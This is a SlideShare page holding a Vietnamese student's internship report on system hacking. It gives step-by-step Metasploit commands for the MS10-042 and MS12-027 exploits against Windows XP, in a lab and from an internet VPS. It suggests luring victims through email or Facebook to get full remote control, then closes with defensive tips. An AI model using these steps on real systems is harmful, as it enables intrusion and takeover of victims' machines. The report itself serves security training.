SlideShare uma empresa Scribd logo
1 de 31
Baixar para ler offline
BÁO CÁO THỰC TẬP
SYSTEM HACKING
GVHD: Thầy Võ Đỗ Thắng
SVTT: Trần Nguyễn Lộc
MỤC LỤC
Giới thiệu1
2
T
3 Tổng Kết
Thực hiện
Giới thiệu
• Theo thống kê của công ty Bkav, từ đầu năm 2013
đến nay, tại Việt Nam đã có 2.405 website của các
cơ quan, doanh nghiệp bị xâm nhập, trung bình
mỗi tháng có khoảng 300 website bị tấn công
• Hiện nay, các thiết bị như máy tính PC, laptop,
đều có kết nối mạng nội bộ hoặc kết nối Internet .
Trên các thiết bị này, hầu hết cài đặt các phần
mềm ứng dụng như IE, Microsoft Office, Adobe
Reader ,…. và chạy hệ điều hành như Windows
XP, Windows 7…
Giới thiệu system hacking
Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra
những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ
chức
Gồm những kỹ thuật lấy username, password dựa vào phần
mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều
hành Windows
Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông
tin, xóa những log file hệ thống
Quá trình tấn công vào một hệ thống
Enumerate (liệt kê): Trích ra tất cả những thông tin có
thể về user trong hệ thống. Sử dụng phương pháp thăm
dò SNMP để có được những thông tin hữu ích, chính
xác hơn
Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất.
Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng
nhập của user. Hoặc bằng một cách nào khác, mục tiêu
phải đạt tới là quyền truy cập vào hệ thống
Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi
giới hạn truy cập từ user binh thường lên admin hoặc
user có quyền cao hơn đủ cho chúng ta tấn công
Execute (thực thi): Thực thi ứng dụng trên hệ thống
máy đích. Chuẩn bị trước malware, keylogger,
rootkit…để chạy nó trên máy tính tấn côngHide (ẩn file): Những file thực thi, file soucecode chạy
chương trình… Cần phải được làm ẩn đi, tránh bị mục
tiêu phát hiện tiêu diệtTracks (dấu vết): Tất nhiên không phải là để lại dấu
vết. Những thông tin có liên quan đến bạn cần phải bị
xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ
thống (System hacking) là
bước tiếp theo sau quá trình
khảo sát, thu thập thông tin
của mục tiêu cần tấn công
bằng những kỹ thuật như
Footprinting, Social
engineering, Enumeration,
Google Hacking… đã được áp
dụng cho mục đích truy tìm
thông tin.
Hệ điều hành Backtrack 5 R3
- Backtrack là một bản phân phối dạng Live DVD của
Linux, được phát triển để thử nghiệm xâm nhập.
Backtrack là sự hợp nhất giữa 3 bản phân phối khác
nhau của Linux về thâm nhập thử nghiệm IWHAX,
WHOPPIX, và Auditor. Trong phiên bản hiện tại của
nó (5), Backtrack được dựa trên phiên bản phân phối
Linux Ubuntu 11.10.
- Backtrack 5 chứa một số công cụ có thể được sử dụng
trong quá trình thử nghiệm thâm nhập của chúng ta
Phần mềm Metasploit
• Metasploit là một dự án bảo mật máy tính cung cấp
các thông tin về vấn đề lỗ hổng bảo mật cũng như
giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống
phát hiện tấn công mạng.
• Metasploit có thể chạy trên hầu hết các hệ điều hành:
Linux, Windows, MacOS.
Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ,
các máy tính thường kết nối với
nhau với khoảng cách vật lý
gần như trong một phòng, một
tầng, một tòa nhà, công ty, …
Các máy tính trong mạng LAN
có thể chia sẻ tài nguyên với
nhau, mà điển hình là chia sẻ
tập tin, máy in, máy quét và
một số thiết bị khác
 .Tấn công mạng Lan
CHUẨN BỊ
 1 máy backtrack 5 R3 có địa chỉ IP: 172.16.0.9(máy tấn
công).
 1 máy win XP có địa chỉ IP 172.16.0.10(máy bị tấn
công).
Xâm nhập và khai thác
Windows XP
• Nhận dạng
Lỗ hổng này có thể cho phép thực thi mã từ xa
nếu người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc
nhấp vào một liên kết thiết kế đặc biệt trong một
thông báo e-mail.
Khai thác lổ hổng Ms10-042
• Thực hiện
Xâm nhập và khai thác
Windows XP
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
Từ dấu nhắc sử dụng lệnh: msf > search ms10_042
Copy đường dẫn, enter gõ use “dán đường dẫn vào”
Gõ show options để thấy các options của lệnh.
msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
 Dùng lệnh set srvhost, lhost, exploit
- Set srvhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3
- Set lhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3
- Lệnh exploit để bắt đầu xâm nhập trên máy nạn nhân.
 Sau khi thực hiện lệnh exploit , thì sẽ tạo ra 1 đường link chứa mã độc , mà
khi nạn nhân kích vào, thì lập tức sẽ nhiễm mã độc và lúc này backtrack 5
sẽ chiếm toàn quyền điều khiển trên máy bạn nhân.(việc lừa nạn nhận kích
vào mã độc tùy vào khả năng của hacker như gửi mail hoặc gửi qua
facebook …., tùy vào khả năng của mỗi người)
 Tới bước này là ta có thể chiếm được toàn quyền điều khiển trên máy
nạn nhân như: xem thông tin trên máy nạn nhân,thêm ,xóa ,sửa file,
thư mục ….. trên máy nạn nhân.
 Xem thông tin trên máy nạn nhân
 Tạo thư mục backdoor thành công.
Xâm nhập và khai thác
Windows XP
a) Mô tả:
Mục tiêu của việc khai thác mã lỗi này là khai thác lỗ hổng của
Microsoft office (word ) trên window.
Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền
sử dụng giống như người dùng đăng nhập vào máy tính.
Khai thác lổ hỗng ms12-027
 Mở giao diện console của công cụ metasploit bằng dòng lệnh msfconsole.
 Search mã lỗi ms12_027 bằng dòng lệnh :search ms12_027
 Tiến hành khai thác mã lỗi bằng dòng lệnh :
use exploit /windows/fileformat/ms12_027_mscomctl_bof.
 Xem hệ điều hành có thể khai thác bởi mã lỗi ms12_027
b) Các bước tấn công
 Tiến hành set filename và set lhost
-Lệnh set filename : tạo ra file word có chứa mã độc
-Lệnh set lhost : set địa chỉ IP của máy backtrack 5.
 Sau khi tạo được mã độc là file word , ta tiến hành sao sao chép file
word này lên máy tính nạn nhân bằng nhiều cách như email……Khi
nạn nhân mở file word bị nhiễm mã độc, thì ta có thể chiếm được toàn
quyền điều khiển trên máy nạn nhân, cụ thể là một sessions mới được
tạo ra.
-Xem thông tin về máy tính nạn nhân sau khi chiếm toàn quyền điều khiển.
-Và có thể thực hiện được những lệnh tấn công khác mà mình muốn.
 Khai thác lỗ hỗng window qua mạng
internet
a) Giới thiệu Honeypot
 Honeypot là một hệ thống tài nguyên thông tin được xây dựng với
mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không
hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp
xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là
Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là
Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực
tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc
như hình thức tấn công, công cụ tấn công hay cách thức tiến hành
thay vì bị tấn công.
b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa
qua Internet
 Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:
- VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại
http://metasploit.org) đóng vai trò là một Honeypot trên mạng.
c) Thực hiện khai thác mã lỗi
 Khi thác lỗi ms10_042 trong windows xp
-Mục đích của việc khai thác mã lỗi này là khai thác lỗi css trong help center
của IE, sau khi khai thác thành công , ta có thể chiếm toàn quyền điều khiển
trên máy nạn nhân.
-Các bước tiến hành như sau:
• Khởi động chương trình metasploit trên máy chủ vps .
• Dùng lệnh search mã lỗi: để xem mã lỗi có toàn tại để khai thác
hay không: Ở đây search 10_042
 Dùng lệnh set srvhost ,lhost , exploit
 Dùng lệnh srvhost 14.0.21.113 : để set địa chỉ ip của máy vps.
 Dùng lệnh lhost 14.0.21.113 : để set địa chỉ ip của máy vps.
 Dùng lệnh Exploit để thực thi mã đã cài đặt, lúc này 1 đường link chứa mã độc
sẽ được tạo ra , và khi nạn nhân kích vào đường link này thì bị nhiễm mã độc và
ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân.
• Đến đây ta chiếm được toàn quyền điều khiển trên máy nạn nhân
Xem thông tin trên máy nạn nhân
Tạo thư mục có tên là thư mục mới
TỔNG KẾT
• Mật khẩu phải được đặt nhiều hơn 8 ký tự và
phải là tổng hợp giữa chữ hoa, chữ thường, số
và ký tự đặc biệt để các chương trình khó dò ra
• Không mở tập tin đính kèm thư điện tử có
nguồn gốc không rõ ràng hoặc không tin cậy
• Chắc chắn rằng bạn có và đã bật hệ thống
tường lửa cho hệ thống của mình.
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Mais conteúdo relacionado

Mais procurados

Slide đồ án tốt nghiệp
Slide đồ án tốt nghiệpSlide đồ án tốt nghiệp
Slide đồ án tốt nghiệpToan Pham
 
Đồ án kiểm thử phần mềm
Đồ án kiểm thử phần mềmĐồ án kiểm thử phần mềm
Đồ án kiểm thử phần mềmNguyễn Anh
 
Báo cáo môn đảm bảo chất lượng phần mềm
Báo cáo môn đảm bảo chất lượng phần mềmBáo cáo môn đảm bảo chất lượng phần mềm
Báo cáo môn đảm bảo chất lượng phần mềmThuyet Nguyen
 
Báo cáo môn mã nguồn mở
Báo cáo môn mã nguồn mởBáo cáo môn mã nguồn mở
Báo cáo môn mã nguồn mởThuyet Nguyen
 
Huong dan thi nghiem wireshark
Huong dan thi nghiem wiresharkHuong dan thi nghiem wireshark
Huong dan thi nghiem wiresharkhien tran
 
Ứng dụng chát realtime android
Ứng dụng chát realtime androidỨng dụng chát realtime android
Ứng dụng chát realtime androidNguyen Thieu
 
Tấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionTấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionNguyễn Danh Thanh
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhạm Trung Đức
 
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfNuioKila
 
Tấn công ARP Cache Poisoning (Man In The Middle) Attacks
Tấn công ARP Cache Poisoning (Man In The Middle) AttacksTấn công ARP Cache Poisoning (Man In The Middle) Attacks
Tấn công ARP Cache Poisoning (Man In The Middle) Attackstiktiktc
 
Báo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroupBáo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroupTinh Ngo
 
Quản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tinQuản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tinAnh Dam
 

Mais procurados (20)

Slide đồ án tốt nghiệp
Slide đồ án tốt nghiệpSlide đồ án tốt nghiệp
Slide đồ án tốt nghiệp
 
Đồ án kiểm thử phần mềm
Đồ án kiểm thử phần mềmĐồ án kiểm thử phần mềm
Đồ án kiểm thử phần mềm
 
Virus
VirusVirus
Virus
 
Báo cáo môn đảm bảo chất lượng phần mềm
Báo cáo môn đảm bảo chất lượng phần mềmBáo cáo môn đảm bảo chất lượng phần mềm
Báo cáo môn đảm bảo chất lượng phần mềm
 
Báo cáo môn mã nguồn mở
Báo cáo môn mã nguồn mởBáo cáo môn mã nguồn mở
Báo cáo môn mã nguồn mở
 
Huong dan thi nghiem wireshark
Huong dan thi nghiem wiresharkHuong dan thi nghiem wireshark
Huong dan thi nghiem wireshark
 
Ứng dụng chát realtime android
Ứng dụng chát realtime androidỨng dụng chát realtime android
Ứng dụng chát realtime android
 
Tấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select unionTấn công sql injection sử dụng câu lệnh select union
Tấn công sql injection sử dụng câu lệnh select union
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
 
Bài mẫu tiểu luận về An ninh mạng, HAY
Bài mẫu tiểu luận về An ninh mạng, HAYBài mẫu tiểu luận về An ninh mạng, HAY
Bài mẫu tiểu luận về An ninh mạng, HAY
 
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
 
Tấn công ARP Cache Poisoning (Man In The Middle) Attacks
Tấn công ARP Cache Poisoning (Man In The Middle) AttacksTấn công ARP Cache Poisoning (Man In The Middle) Attacks
Tấn công ARP Cache Poisoning (Man In The Middle) Attacks
 
Bai Tap Ms Project Part 1
Bai Tap Ms Project Part 1Bai Tap Ms Project Part 1
Bai Tap Ms Project Part 1
 
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đĐề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
 
Báo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroupBáo cáo thực tập chuyên nghành lập trình Android GPSGroup
Báo cáo thực tập chuyên nghành lập trình Android GPSGroup
 
56251639 bao-dam-chat-luong-pm
56251639 bao-dam-chat-luong-pm56251639 bao-dam-chat-luong-pm
56251639 bao-dam-chat-luong-pm
 
Luận văn: Tìm hiểu kỹ thuật lập trình Network Service, HOT
Luận văn: Tìm hiểu kỹ thuật lập trình Network Service, HOTLuận văn: Tìm hiểu kỹ thuật lập trình Network Service, HOT
Luận văn: Tìm hiểu kỹ thuật lập trình Network Service, HOT
 
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đĐề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
Đề tài: Tìm hiểu hệ thống phát hiện xâm nhập IDS-SNORT, 9đ
 
Quản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tinQuản trị dự án công nghệ thông tin
Quản trị dự án công nghệ thông tin
 

Destaque

Ctdl C05
Ctdl C05Ctdl C05
Ctdl C05giang
 
Giáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàng
Giáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàngGiáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàng
Giáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàngShin Nosuke
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_AthenaHuynh Khang
 
Ctdl C10
Ctdl C10Ctdl C10
Ctdl C10giang
 
Ctdl C02
Ctdl C02Ctdl C02
Ctdl C02giang
 
Ctdl C11
Ctdl C11Ctdl C11
Ctdl C11giang
 
Ctdl C01
Ctdl C01Ctdl C01
Ctdl C01giang
 
Ctdl C09
Ctdl C09Ctdl C09
Ctdl C09giang
 
Ctdl C06
Ctdl C06Ctdl C06
Ctdl C06giang
 
Ctdl C04
Ctdl C04Ctdl C04
Ctdl C04giang
 
Ctdl C08
Ctdl C08Ctdl C08
Ctdl C08giang
 
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...Security Bootcamp
 
Ctdl C03
Ctdl C03Ctdl C03
Ctdl C03giang
 
Ctdl C07
Ctdl C07Ctdl C07
Ctdl C07giang
 
Gioi Thieu
Gioi ThieuGioi Thieu
Gioi Thieugiang
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTMasterCode.vn
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậtanhkhoa2222
 

Destaque (20)

Ctdl C05
Ctdl C05Ctdl C05
Ctdl C05
 
Giáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàng
Giáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàngGiáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàng
Giáo trình cấu trúc dữ liệu và giải thuật của lê minh hoàng
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
 
Ctdl C10
Ctdl C10Ctdl C10
Ctdl C10
 
Ctdl C02
Ctdl C02Ctdl C02
Ctdl C02
 
Ctdl C11
Ctdl C11Ctdl C11
Ctdl C11
 
Ctdl C01
Ctdl C01Ctdl C01
Ctdl C01
 
Ctdl C09
Ctdl C09Ctdl C09
Ctdl C09
 
Ctdl C06
Ctdl C06Ctdl C06
Ctdl C06
 
Ctdl C04
Ctdl C04Ctdl C04
Ctdl C04
 
Ctdl C08
Ctdl C08Ctdl C08
Ctdl C08
 
Avl
AvlAvl
Avl
 
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
Security Bootcamp 2013 - Giải pháp phát hiện xâm nhập mạng không dây - WIDS -...
 
Ctdl C03
Ctdl C03Ctdl C03
Ctdl C03
 
Ctdl C07
Ctdl C07Ctdl C07
Ctdl C07
 
Wireless
WirelessWireless
Wireless
 
Gioi Thieu
Gioi ThieuGioi Thieu
Gioi Thieu
 
man in the middle
man in the middleman in the middle
man in the middle
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mật
 

Semelhante a Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýQuý Đồng Nast
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýQuý Đồng Nast
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1Anhh Hữu
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2Con Ranh
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1Con Ranh
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
Báo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaBáo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaQuý Đồng Nast
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn SángĐàm Văn Sáng
 
CEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdfCEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdfPeterTh3
 
Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...
Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...
Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...Security Bootcamp
 
Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024markha82
 
Canh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomwareCanh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomwarethanglx
 

Semelhante a Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc (20)

Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hacking
 
Báo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athenaBáo cáo tổng kết thực tập athena
Báo cáo tổng kết thực tập athena
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn Sáng
 
Virus full
Virus fullVirus full
Virus full
 
Apt oct-2014
Apt oct-2014Apt oct-2014
Apt oct-2014
 
Ch19
Ch19Ch19
Ch19
 
CEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdfCEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdf
 
Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...
Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...
Tấn công và khai thác mạng máy tính theo mô hình thường trực cao cấp APT - Lê...
 
Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024Bài 9-An toàn trên không gian mạng-12042024
Bài 9-An toàn trên không gian mạng-12042024
 
Canh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomwareCanh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomware
 

Último

50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...
50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...
50 ĐỀ ĐỀ XUẤT THI VÀO 10 THPT SỞ GIÁO DỤC THANH HÓA MÔN TIẾNG ANH 9 CÓ TỰ LUẬ...Nguyen Thanh Tu Collection
 
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...
ĐỀ THAM KHẢO THEO HƯỚNG MINH HỌA 2025 KIỂM TRA CUỐI HỌC KÌ 2 NĂM HỌC 2023-202...Nguyen Thanh Tu Collection
 
syllabus for the book "Tiếng Anh 6 i-Learn Smart World"
syllabus for the book "Tiếng Anh 6 i-Learn Smart World"syllabus for the book "Tiếng Anh 6 i-Learn Smart World"
syllabus for the book "Tiếng Anh 6 i-Learn Smart World"LaiHoang6
 
đồ án thương mại quốc tế- hutech - KDQTK21
đồ án thương mại quốc tế- hutech - KDQTK21đồ án thương mại quốc tế- hutech - KDQTK21
đồ án thương mại quốc tế- hutech - KDQTK21nguyenthao2003bd
 
200 câu hỏi trắc nghiệm ôn tập PLDC.pdf
200 câu hỏi trắc nghiệm ôn tập  PLDC.pdf200 câu hỏi trắc nghiệm ôn tập  PLDC.pdf
200 câu hỏi trắc nghiệm ôn tập PLDC.pdfdong92356
 
ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...
ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...
ĐỀ CƯƠNG + TEST ÔN TẬP CUỐI KÌ 2 TIẾNG ANH 11 - GLOBAL SUCCESS (THEO CHUẨN MI...Nguyen Thanh Tu Collection
 
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoabài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa
bài 5.1.docx Sinh học di truyền đại cương năm nhất của học sinh y đa khoa2353020138
 
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...
SÁNG KIẾN “THIẾT KẾ VÀ SỬ DỤNG INFOGRAPHIC TRONG DẠY HỌC ĐỊA LÍ 11 (BỘ SÁCH K...Nguyen Thanh Tu Collection
 
vat li 10 Chuyen de bai 4 Xac dinh phuong huong.pptx
vat li 10  Chuyen de bai 4 Xac dinh phuong huong.pptxvat li 10  Chuyen de bai 4 Xac dinh phuong huong.pptx
vat li 10 Chuyen de bai 4 Xac dinh phuong huong.pptxlephuongvu2019
 
Bài giảng về vật liệu ceramic ( sứ vệ sinh, gạch ốp lát )
